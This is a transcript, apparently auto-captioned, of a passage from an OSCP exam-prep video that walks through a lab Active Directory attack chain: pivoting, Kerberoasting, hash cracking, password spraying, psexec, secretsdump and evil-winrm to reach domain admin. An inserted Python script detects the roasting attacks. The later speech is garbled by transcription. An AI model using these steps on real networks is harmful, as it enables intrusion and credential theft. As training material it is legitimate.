-selfcert, and boom, the Ligolo server is up and running and it's listening on 11601. So now on this side we'll say agent.exe -connect, port 11601, we'll say -retry and -ignore-cert. Boom, look at that: NT AUTHORITY\SYSTEM on MS01 has connected. So now if we type in session, it says which session would you like? Well, we want the only session we've got; let's do number one, and here we are on there. So now at this point we could type in ifconfig, and we can see we've got our 10.10.1.201 interface as well as our outside interface. So now all we have to do is type start, and boom, we have started that tunnel and it is accessible to us.

We have one last thing that we need to do, which is of course assign routing. How are we going to get there? We need to tell our box how to get there. So let's just go ahead and do this. We've essentially got the agent running, and we can see any status messages here; we've got the server running and the tunnel created, so let's just minimize this. Let's create another terminal session, and at this point let's go ahead and do some further enumeration. We should be able to ping, for example, the DC, so let's pick on DC01; it's a good place to start. Make a folder called enum, loot, files, exploits, and for giggles, at this point... well, actually, before we do our giggles, first we need to add that route. So we'll say sudo ip route add 10.10.1.0/24, where do we go? We send it to our ligolo interface. Oh, and it would help if we can spell correctly. Boom, here we can see this has been added, and we should, for example, be able to send two packets to DC01. Ah, there we go, we are in business. For giggles, let's see if MS02 responds, and surprisingly it does not. It most likely has its firewall up, but we can see that we at least have connectivity and routing.

So let's start enumerating. Now that we can enumerate, what are we going to enumerate? Well, we need to enumerate the services, right? So let's go back to our nmap -T4 -p-. Actually, in this case, well, because we know we're going to have lots of ports open on the
domain controller, we'll do common scripts and version fingerprinting across all those ports, but let's not do it across all of them: only run scripts and version fingerprinting on ports that are open, please. We're going to run it across DC01, and let's log that to enum/nmap-ports-versions.log, and we're going to go ahead and, oh, you know, let's add, just for giggles, -v, because I would also like to see what's going on. Right off the bat we can see we've got ports open, so we'll let this bake. Actually, I take that back: we're going to work concurrently, right? We're not just going to do this against DC01. Let's split vertically and run a concurrent one against MS02. So similarly we can say mkdir enum files loot exploits, sudo nmap -T4 -p- -sCV -v MS02, save the output to nmap-ports-versions.log, and yep, that looks good. Let it bake, and sure enough, yep, we at least found 135 is open. All right, we'll come back to this shortly.

Actually, as I'm noticing this running, one of the reasons why I like verbose is we can already see we've got port 445 open, which is SMB. So while we've got these guys running, let's continue: we're going to split this again, so we'll move this over, we'll be on this side, and let's split vertically, and while those are running, on this side let's go ahead and check out SMB. smbclient is a fantastic application we can use here. Let's just do a list, -L DC01; the user is going to be Wildstyle, because we know Wildstyle's password, and... oh, but it did WORKGROUP, so let's change that. awesome24!, and yes. So default, default, those are all defaults, but that's not a default: let's take a look at that. Backups. What's a backup share? I like backups; please tell me more. Let's connect to that. -L was listing it; in this case, let's actually take a look. All right, so we're logged in... oh no, access denied. Okay, so while yes, this does exist, we do not have access to it. All right, how about we do the same thing on MS02? Nope. Okay, so no SMB shares. Well, we
haven't seen anything pop open there, so that makes sense. Actually, according to this, our scan is done: there is only port 135 open. Let's go ahead and cat that; sure enough, just 135. So there's not much that we can do with this, unfortunately. So what else can we do? We're going to have to attack DC01 more than MS02 currently. Actually, you know what, that doesn't feel right. It's got to have more than that. Let's run that scan again, only in this case we're going to take off -T4. Let's go a little bit more slowly and see if we pick anything up; maybe we were too quick. Okay, so we're going to run that, and yeah, I wonder if this was because we're running too many nmap scans at the same time, or maybe I was too aggressive with the -T4, but here we can see we did catch some additional ports, like 445. So let's try this again: let's list what shares are available. Okay, there we go. See, this goes to show it never hurts to double check or go back and recheck things, especially just doing the due diligence of making sure you get the same results twice.

So here we can see there is a non-default share called setup. Can we access that? Maybe we couldn't access anything on DC01, but maybe we can access this share on MS02. Let's give it a shot. Aha, we did. What do we see? Ah, nothing of value, just the autologon executable that would probably be used to set up an autologon. So this is not helpful at all, although it does at least let us know that we have SMB access, so we could potentially take advantage of that with something like psexec once we get some credentials that have admin privileges on that machine, or potentially, if we get additional credentials, we could authenticate and see if there's a different listing of shares.

Other than that, it looks like the next thing that I would typically do at this point is try and get some credentials for free. What do you mean by that? Well, what I mean by that is, once you have valid Active Directory credentials, we can spray those credentials
against DC01, or any Active Directory domain controller as part of the domain, and see if there are any Kerberoastable users or any AS-REP roastable users, and the intention here is that we will get hashes for free, because these are exposed accounts that are intended to provide services, such as having a service principal name attached.

So where are we at? Well, we enumerated: we found DC01, and we also found MS02. MS02 seems to have 139... one, actually I should have said 135, 139, and 445, and we saw that 445 does have a setup share. On DC01 we have quite a slew of ports open; looks like this is still running, but we can tell we've got quite a few. SMB is the one that we immediately picked up on, so let's at least call that out. We've got 445... well, we've got 20, 25, it looks like... oh no, not SMTP; 53, we had DNS, and then 445. Those are the two quick and easy ones. On here we had a backups share, no access; we should say authentication denied. So far, empty, just an autologon file. Okay, so now things to try: let's try Kerberoasting, let's start with that, and then let's also try AS-REP roasting.

So grab another shell, just because I like to have as many terminals open as possible, and go to our Desktop, DC01, just so that I know where I'm at. In this case we can use some of our Impacket tool set, so if we do impacket-GetUserSPNs, of course it's going to give us all these options. What we really want is our target and our username, so we're going to do oscp/wildstyle at DC01. Let's see what we get; fingers crossed. Actually, I think one thing we missed is we're probably going to need to do the -dc-ip, DC IP 10.10.1.200. Let's start over. So it should be impacket-GetUserSPNs; in this case, what we should have been doing was, oh, yep, there it is: so we're making a -request, which I mentioned, and then who are we sending it to, or who's the IP for the DC? It is DC01. Who are we? We are Wildstyle. Let's try that. Uh oh, did we miss
something? Oh yeah, OSCP... what? .lab. Boom, there we go; syntax is everything. So this is what we were shooting for. Don't forget, that's something we enumerated earlier, right? It wasn't just OSCP, it's oscp.lab. And we got some goodies: we essentially found that the service user, svc_iis, has a service principal name attached to it, this guy, and sure enough that means that we can query and get its hash. So we now have a hash we need to save, so let's take this, copy it, and save it, and if we do hashid... oh, actually, it does not recognize it. That's funny, but we hopefully can crack this.

Now that we have that, let's go ahead and see if we have any AS-REP roastable users. AS-REP roastable users: that's essentially checking for accounts not requiring Kerberos pre-auth. Similarly, it's going to be in the Impacket tool set, but we can also use, in this case, GetNPUsers. Similar syntax, right? So -request, -dc-ip DC01, and oscp.lab/wildstyle. Let's see if we got any AS-REP roastable... oh, we do. Hello. Okay, so MetalBeard is AS-REP roastable. In this case, let's go ahead and copy this $krb5asrep$ hash and go back into our... actually, we'll just make another one: hashes.asrep. So now we have hashes, which is, as we can see here, a Kerberos hash, and then we've also got hashes.asrep, which is our MetalBeard user with an AS-REP Kerberos ticket, the AS-REP from the ticket granting service.

So now what would we do? We've got hashes. If your answer is we would pass these hashes, your answer is incorrect, unfortunately, because these are not NTLM hashes; they're not NT or LM hashes, so these are not passable, but they are crackable. So let's see if we can crack. Let's go ahead and throw one of my favorites, good old hashcat, at it. Start with hashes.asrep, and we're going to use a wordlist, /usr/share/wordlists/rockyou.txt. Again, as far as the OSCP exam is concerned, and as far as my typical process, while there are tons of wordlists you should be able to use, you should be able to crack any of the applicable words or
applicable hashes on the exam with either a custom wordlist from a web page or some data that you've been gathering, or information about the domain or the workstation, or, more commonly, if you don't have anything, run rockyou. If you don't find it, odds are it's not a crackable password. So let's find out if this one is crackable. We'll go and let this run; shouldn't run for too long, but you can always hit enter or hit a button and it'll tell you, hey, here's how long I have left. As you can see here, it is recognizing the AS-REP hash, it's running the rockyou file as its base, and it came back, and sure enough we did not recover anything.

So we could also add on, if you have the time, although it's not always necessarily the right move, a rule set. So we could say /usr/share/hashcat/rules... honestly, I usually have good success with best64. If you don't find it with that, again, odds are it's not going to be crackable, at least not within the OSCP exam's expectations of being crackable. So we'll run that, and in this case, see, as soon as you add that rule set on there, it takes much longer, because it's applying those variations and mutations to every word in the rockyou list. So here we can see the guess mode is this rule list. Just for giggles, I'll go and let this run for 10 minutes and let's see if it comes back with anything, but if I was doing this during the exam, I would continue to, in this case, enumerate further, because if I run two cracks, one on this and one on the Kerberos hash, at the same time, it's just going to cut down the time... or rather, it's going to extend the time to crack both, because, well, we've only got so much CPU power, and we are, as you can see here, pegged out; we're using all of our resources. So we'll come back when this finishes in about 10 minutes. And sure enough, we finished and it was not recovered, which means this was probably a waste of time, but you don't really know until you invest that. So again, always be multitasking. In this case, now that we verified we
cannot crack the AS-REP hash that belongs to MetalBeard, how about the Kerberos one? So let's go ahead and run hashcat again against hashes and use our rockyou wordlist and see what happens here. Quick status check: should only take about four... oh, and we got a hit. Hello. The service account's password is Portland7@. Wonderful. Now we've got some additional access, and again, these were credentials we got for free; didn't cost us anything. So let's save this: AS-REP roasting found MetalBeard, but the password was not crackable. Kerberoasting, we found svc_iis and the password was crackable, and it is Portland7@. So we'll take that, let's copy that. We've now got some credentials to save, so we go down here to credentials. Now we've also got oscp\svc_iis, and the password is Portland7@. So we've got two sets of creds.

So what's the first thing that we do when we get additional sets of credentials? We enumerate with those credentials, right? Everything has started all over. So now let's add on here: found AS-REP and Kerberoastable users; svc_iis's password was crackable. So now we're on to step nine, which is further enumeration. Let's go ahead; we already saw the SMB services were open, we saw we had some shares, let's go back. Let's retry; that's our things to try now, right? Let's go back and enumerate SMB with the new creds, the service account. Let's clear this and continue.

So another tool that I like to use when I'm beginning my SMB enumeration is also to enumerate privileges, and there's a fantastic tool for that called CrackMapExec, or CME for short. CrackMapExec can help us with the SMB protocol. To use it, though, what we're going to need to do is create just a couple of easy files. So let's do nano users... actually, let's do this at the Active Directory level, let's go back. We know we have Wildstyle, and we know we now have svc_iis. For passwords, we know we have Wildstyle's password, which was awesome24!, and now we just received the svc_iis one. Let's save that.
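Both roasting techniques used above leave a distinctive trace on the domain controller: a Kerberoast request shows up as a 4769 service-ticket event whose ticket encryption type is RC4-HMAC (0x17) for a user account with an SPN, and an AS-REP roast shows up as a 4768 TGT request with pre-authentication type 0 for an account that has pre-auth disabled. The script below is an added example (not code from the video) of the detection a defender would run over those events; the events are constructed for this example in the shape of the 4768/4769 fields the logic needs, with the lab's account names and made-up extra service accounts (svc_sql, svc_web) and client addresses.

```python
"""Flag Kerberos ticket requests that look like Kerberoasting or AS-REP roasting.

Added example, not from the video. Input is a list of dicts carrying the
fields of Windows Security events 4768 (TGT requested) and 4769 (service
ticket requested). The sample events are constructed; svc_sql and svc_web are
made-up service accounts used only to show the burst rule.

Rules:
  * asrep-no-preauth : 4768 with PreAuthType 0 (pre-authentication not required)
  * rc4-tgs          : 4769 with TicketEncryptionType 0x17 (RC4-HMAC) for a
                       user account (machine accounts and krbtgt are skipped)
  * rc4-burst        : one client requesting RC4 tickets for several distinct
                       services, the signature of a tool enumerating all SPNs
"""
from collections import defaultdict
from typing import Dict, List

RC4_HMAC = "0x17"
PREAUTH_NOT_REQUIRED = "0"


def flag_events(events: List[Dict], burst_threshold: int = 3) -> List[Dict]:
    findings = []
    rc4_services = defaultdict(set)  # (client ip, requesting account) -> {service}
    for ev in events:
        eid, ip = ev["EventID"], ev["IpAddress"]
        if eid == 4768 and ev.get("PreAuthType") == PREAUTH_NOT_REQUIRED:
            findings.append({"rule": "asrep-no-preauth", "client": ip,
                             "account": ev["TargetUserName"], "service": "krbtgt"})
        elif eid == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
            svc = ev["ServiceName"]
            if svc.endswith("$") or svc.lower() == "krbtgt":
                continue  # machine accounts / TGT renewals: noisy and not roastable targets
            findings.append({"rule": "rc4-tgs", "client": ip,
                             "account": ev["TargetUserName"], "service": svc})
            rc4_services[(ip, ev["TargetUserName"])].add(svc)
    for (ip, acct), svcs in sorted(rc4_services.items()):
        if len(svcs) >= burst_threshold:
            findings.append({"rule": "rc4-burst", "client": ip, "account": acct,
                             "service": ",".join(sorted(svcs))})
    return findings


def _ev(eid, user, ip, **fields):
    """Constructed event record in the shape of the fields used above."""
    rec = {"EventID": eid, "TargetUserName": user, "IpAddress": ip}
    rec.update(fields)
    return rec


# Constructed sample: a roasting run from 10.10.1.201 plus normal AES traffic
SAMPLE_EVENTS = [
    _ev(4768, "metalbeard", "10.10.1.201", PreAuthType="0", TicketEncryptionType="0x17"),
    _ev(4768, "wildstyle", "10.10.1.201", PreAuthType="2", TicketEncryptionType="0x12"),
    _ev(4769, "wildstyle@OSCP.LAB", "10.10.1.201", ServiceName="svc_iis", TicketEncryptionType="0x17"),
    _ev(4769, "wildstyle@OSCP.LAB", "10.10.1.201", ServiceName="svc_sql", TicketEncryptionType="0x17"),
    _ev(4769, "wildstyle@OSCP.LAB", "10.10.1.201", ServiceName="svc_web", TicketEncryptionType="0x17"),
    _ev(4769, "emmet@OSCP.LAB", "10.10.1.202", ServiceName="MS02$", TicketEncryptionType="0x12"),
    _ev(4769, "emmet@OSCP.LAB", "10.10.1.202", ServiceName="MS02$", TicketEncryptionType="0x17"),
]

if __name__ == "__main__":
    for f in flag_events(SAMPLE_EVENTS):
        print(f"{f['rule']:<18} client={f['client']:<13} account={f['account']:<22} service={f['service']}")
```

The RC4 rule is the one that matters in practice: a domain whose service accounts hold AES keys should almost never issue RC4 service tickets, so a single 0x17 ticket for a user-account SPN is worth a look, and several in a row from one client is the roast itself. The corresponding fixes are the usual ones, long random passwords or group managed service accounts for SPN holders, and enabling pre-authentication on every account that has it turned off.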
Now we can do crackmapexec smb, and it'll be -u for users, -p for passwords, and who are we going to look at? Let's look at DC01. And I think I did that incorrectly, my order again; it helps to have the right syntax. See, it doesn't like that. How about 10.10.1.200? Okay, so apparently it just doesn't like hostnames; that's the problem. So in that case... and again, the great thing about CrackMapExec is you just give it a destination and it will come back with a whole bunch of juicy info, as well as fingerprinting what we're looking at. So port 445, SMB, 10.10.1.200, the hostname is DC01, here's our OS, our hostname, and our domain name, and it looks like SMB signing is on and SMB version 1 is not enabled. So now let's go ahead and do our... oh, instead of this. So now we know it's that, and -u users -p passwords, let's see what we get now. Oh, and we forgot to say, because it'll just stop on the first success, --continue-on-success. Okay, so it definitely doesn't show that we have any special privileges, but we can log on, so we may want to see if we get different levels of access. Same thing, we can do this against 10.10.1.202, which is MS02. What do we get? Okay, same thing: we can log on with SMB, but still no special admin access.

So let's do that: let's go ahead, go back to our good old friend smbclient. Well, it's clear, smbclient, and let's in this case do DC01 and our backup share. We saw, again, it was backups; the user is going to be oscp, and instead of Wildstyle this time we're going to try svc_iis, and our password was Portland... oh, what was it? It's Portland 7, ampersand. Hello, we now have access; we're not getting denied. So there is an it-users.zip file in a backups share, and this sounds fantastic; I want this, please, let's check this out. So in this case, let's go and say, I believe it's get it-users.
zip. That should download it. Yes, that downloads it. Let's exit. Let's move this file to DC01/files. All right, let's check this out, let's 7z extract... oh, you want a password. Okay, so no password; if I just hit enter, error, does not work. Okay, let's try... oh, but of course, quit. Yeah, zero bytes, so there's nothing there. So let's try this again: how about "password"? How about "admin"? How about "password123"? Okay, well, we could spend all day and all night trying these out, or there might be a faster way to do this than manually. Let's leverage hashcat... or better yet, we can't, actually, because hashcat won't work with this. There is a way to do this, though, and that's with John the Ripper. However, John can't work with the zip file directly; what it needs is that password hash, right? Because we don't crack zip files, we just crack hashes. So there is an actual tool for this called zip2john. If we say zip2john and give it the zip file, it's going to spit out a hash. Let's actually save that to an it-users hash file. I'm going to remove the it-users.txt file since that's empty; don't need that confusing us. So we have a hash file and we have our zip file. So now we can take, let's go and clear, John the Ripper and we can throw it at the it-users hash, but we're going to need some password list, and what's the password list that we default to, or I default to, for the OSCP? It is, what we're going to have to say, not rules, it's going to be wordlist, I believe --wordlist=/usr/share/wordlists/rockyou.txt. See what we come back with, and bingo, immediately we get a hit. That's fast, John, thank you, you are fast. tbrick14, okay, let's try that. So if we say 7z x it-users.zip and we give it t
brick4... everything is okay. We now extracted our file. What do we have? This looks good: we have 109 bytes of text. Please have some juicy goodness in here. Let's see what we got. Yes, we have credentials; this is fantastic. So we've got usernames and passwords. We were just using a tool a second ago that might help us out with some usernames and password spraying, so let's go back to CrackMapExec. CrackMapExec can leverage this information very quickly to our advantage. So let's go ahead and use crackmapexec smb 10.10.1.200 and 10... well, we should be able to do comma, 10.10.1.202, see if that works. First of all, check that... oh, I don't think it liked that. How about a dash? Yep, that works better. Okay, so we're just going to use the dash and just ignore anything we get for .201, since we already own that box, and then we can say -u it-users.txt and --continue-on-success, oh, and we forgot it-users.txt. Oh, that doesn't work. Look at that: instead, it's actually grabbing the usernames and the passwords and passing them all at the same time, so that's not going to work for us. In this case, a quick workaround would be to say cat it-users.txt and let's do cut, our delimiter is that, we want the first field, and spit that out to users.txt; in this case we'll just say users. Now do the second field and spit that out: that is passwords. Now we can go back to our CrackMapExec and say -u users -p passwords, and in this case, I think it was -d for domain; we want to make sure and specify that as oscp.
lab. Oh, hello. Anyone see that? I saw that. So as we go through and spray these, you'll see Superman with superhero, Superman... it's basically going through and trying every combination of the usernames and passwords, seeing if there are any shared passwords across there, and sure enough, Emmet works on DC01, which is great; we can look to see if we have any additional shares or privileges that we might have access to on those shares. But more importantly: pwned. Look at that. So Emmet, with the password Rex rules, has admin access to MS02. That is lateral movement. Now we're able to jump from MS01, well, technically we're going to be running through MS01, and we now have potentially admin access to MS02. That's instant admin access; we don't even have to privilege escalate in this case.

So let's try that, let's test that out. What are we going to use? Hint: it's not going to be smbclient. Different tool, fantastic tool: we're going to use the Impacket version of psexec, because psexec will take advantage of that SMB protocol and essentially give us a shell as Emmet. So let's check our commands, make sure that we understand how we use it correctly, because as we saw earlier, syntax matters and order matters. So in this case we're going to go ahead and say, we don't need to run a command, we just want to say psexec oscp/emmet, I believe it'll just be at, or in this case we would just give it a... yeah, let's do the at, 10.10.1.202, let's use the IP just to be specific here, password, paste, yes. Here we did it: we requested a share, got access to the ADMIN$ share, uploaded our payload, opened it using a service, creating a service, oh sorry, we used Service Manager to create a service, started it, and boom, got ourselves a reverse shell, and whoami: SYSTEM on MS02. Oh, that is so wonderful. That is instant admin access, immediate privilege escalation. What's the next thing that we want to do, since we have privilege escalation on an additional machine? We want to search for the loot, right? Let's search for the loot.
So let's go ahead and go to the backslash, the root, traditionally. On the exam, I expect everything to be under Users, but again, on your control panel it should tell you where to search, or more specifically, what's going to be important. And I see a Lord Business. Lord Business, what are you doing on this machine, huh? I mean, that makes it pretty quick and easy. What if we just go to Lord Business, and what are the odds it should be potentially on the desktop? Sure enough, there it is, there's our loot: type proof.txt. Bam, that is money. Let's copy that and save that: so exit, MS02 directory, loot already there, nano proof.txt, paste clipboard. Oh, and we forgot the big, most important thing, especially for the exam, right, which is going to be: jump in there as Emmet, and let's go ahead and... oh, we need to go back and grab that password, because I do not remember what that was off the top of my head. cat... oh, that was DC01/files, it-users.txt, that password. Users, Lord Business, Desktop, so for the exam, right, we type: show me the money, give me that data. Do whoami, ipconfig, and I always like to do hostname as well. There we go, take a screenshot of that, boom, that is your evidence for your submissions that you need; that's what you build your report from. From there we can exit back out. We've got our loot, so now that we've got that, let's go ahead and update our documentation to say: we found an it-users.zip file on the backups share from DC01. Then what did we do? We cracked the password for it-users.
zip with crack map exac at that point we found it users do text with credentials within the zip [Music] file sprayed at that point what did we do we sprayed new credentials against mso2 and dco1 and found EMT ocp EMT has local admin privileges on mso2 at that point we're at the next step so we've kind of been flying along here this this is what we've been doing with our things to try we've added a few options on here we now have another set of credentials ocp Emit and that password with Rex rules so at this point we know we have local access onto mso2 we can go ahead and run well actually we already noticed there was another user logged on Lord Business right right we've got credentials let's go ahead and go back and log back on let's do some quick manual enumeration we can have an a shell here essentially as Emit and local admin but domain user credentials and now we have interest in this Lord Business right who's Lord Business what can we find in there we might have some juiciness let's see text actually this would be Lord Business star. 
text oh you're kidding me no you're not kidding me cuz that makes sense we're on Windows not Linux what are you thinking get your syntax right so we found our proof the rest of this is a lot of fluff in the app data local packages so there's nothing else I'm seeing it's going to be helpful we can't really clear this but what might be helpful is checking out what that user is now since we have credentials we can do our typical local actually we could say net user see how many what users we have so there's no other local users on this this machine we can Al now do net user doain and we can look at all the domain users and sure enough there is a domain user for Lord Business tell me more about Lord Business net user Lord Business SL doain what what do you see this do you see what I'm seeing Lord Business group memberships domain admin ads that is a domain admin account this is domain Ownage if we can get access to this so this is very very interesting I would love to know more and more importantly I would love I so at this point we know that Lord Business is logged in what are the odds Lord business's credentials are cashed on this machine do you think we can grab grab that it's this is an example where we could use mimicat but there's another tool that allows us to do this remotely from our Cali box a new let's use impac it because impa it is so awesome that tool set is fantastic secret stump so secret stump can do a number of different things but it's all about giving us credentials it's almost like a remote version of mimic hats right so if we do Secrets dump and we point it at our destination in this case mso2 well what we want to do is let's try Secrets dump and in this case we know our ocp emit at 10101 1202 should have local admin privileges cuz just like PS exec it needs admin privileges uh at least local admin privileges here we go fingers crossed what are we going to get so oh yeah money that's what we're getting and absolutely sure enough so not only do we 
have dumped cached domain credentials of Lord Business but even better than that default password this is actually set for potentially like Auto logon which we saw in that setup file or setup directory which would make sense as to here sure enough tacos Tuesday Lord Business we now have plain text credentials for Lord Business if we didn't then we could also run or play past the hash with essentially the NT hash for Lord Business but we don't even need it in this case because we have the plain text password so let's give that a shot what do you think let's update our documentation used secret stump to extract cashed creds from mso2 and found Lord Business this hash and password we also used net user command to enumerate that Lord Business is a member of domain admins fantastic so you might be thinking exactly what I'm thinking which is the next step to Let's attempt to use Lord Business and PS exec perhaps actually better than that domain controllers have when RM enabled so there's another tool that gives us native abilities and some additional abilities on on top of PS exec that is evil wi RM to obtain domain admin shell on dco1 let's see let's see if this works and we can use evil when RM two ways we can use it with the hash and we can also use it with the password so let's go ahead and try just for fun with the hash in this case it would be evil win RM let's double check so the user ocp SL Lord Business and our Target is going to be actually so in this case I take that back it's going to be Dash I is just seeing that right there dasi for the IP so we can just say dco1 well let's go and use the IP 10 10200 the user it's going to be Lord Business we can skip the ocp it's actually implied since we're hitting a domain controller and let's try the hash so Capital H for the hash and let's paste that that's a password we'll try that next out paste selection let's see if that works I like to do pass the hash also just because we know that the hash should be good uh so 
establishing connection remote endpoint oh and authorization Deni so maybe that is not an nty might have to use mimic hats or another tool to get the Nash I'm going to guess that that's not it thankfully we don't have to go through any password cracking again we can just go right back to our plain text password so instead of DH we'll just do- [Music] P oh yeah that's it we're in and sure enough if we go to our desktop I'm going to guess oh you're not going to show me anything really nothing on there huh okay how about there we go administrator I bet you let's just look how about tree actually slf SLA administrator boom there it is desktop proof absolutely type actually you know let's go into it administrator desktop and let's get our screenshot right what do we want we want proof. text we want who am I we want IP config and what what do I also like to do just for Giggles host name bam screenshot that in this case we can also say download I believe with we evil winrm we've got some other cool options like we can upload and download files that isn't uh I don't believe supported with PS exact so we can say download proof. text sure enough got [Music] it and we need to move that that should not belong there proof. text let's go to dco1 loot and let's cat that sure enough there we go we have just obtained complete domain admin privileges we were able to obtain the loot from all of our active directory set this was step by step how to move through one example attack path so at this point we didn't attempt did we used Lord Business and we evil win RM to obtain domain admin shell on dco1 and we got our proof. 
text so at this point we would want to go back I would double check everything verify everything I would take screenshots again and basically start writing my report uh with what I had known assuming that I didn't have three more boxes to do which on the exam you will of your independent machines that also need to be hacked so the active directory set that we just went through only represents three of the boxes out of the six that you you need to work on and attack if you want to get 100% on the exam so we again moved into ms1 exploiting uh some code uh well some remote arbitration that's unfortunately unauthenticated using that software running on msl1 and we that at that point were able to use the service to get the unquoted service path to get privilege escalation on msl1 and then at that point we were able to gather our or will we found wild styles credentials saved in the Powershell history and then used that to enumerate we found SMB shares on dco1 from there we had to use some curb roasting to actually get some free credentials and use those creds that actually did have access to that share on dcl1 found the zip file had to crack the password on the zip file and within the zip file was our um text file with some more credentials but then we had to enumerate those credentials and found that one of them EMT had admin access on mso2 and then with that we were able to enumerate that there was a domain admin logged on to mso2 so we dumped the credentials and within the dumped credentials of mso2 we found Lord Business and Lord Business was our domain admin that gave us access directly into the domain controller and add immediate admin and full domain Ownage hopefully you all followed and enjoyed that if nothing else this is going to be great documentation and a reminder for one of the attack paths that I like to practice and I suppose if there's enough demand we may throw some other ones out there uh some additional ones that I practiced and that I thought were 
worthwhile to essentially practice all of the variety of ways of attacking active directory for the ocp
Info
Channel: Derron C
Views: 26,952
Id: gY_9Dncjw-s
Length: 117min 1sec (7021 seconds)
Published: Fri Oct 20 2023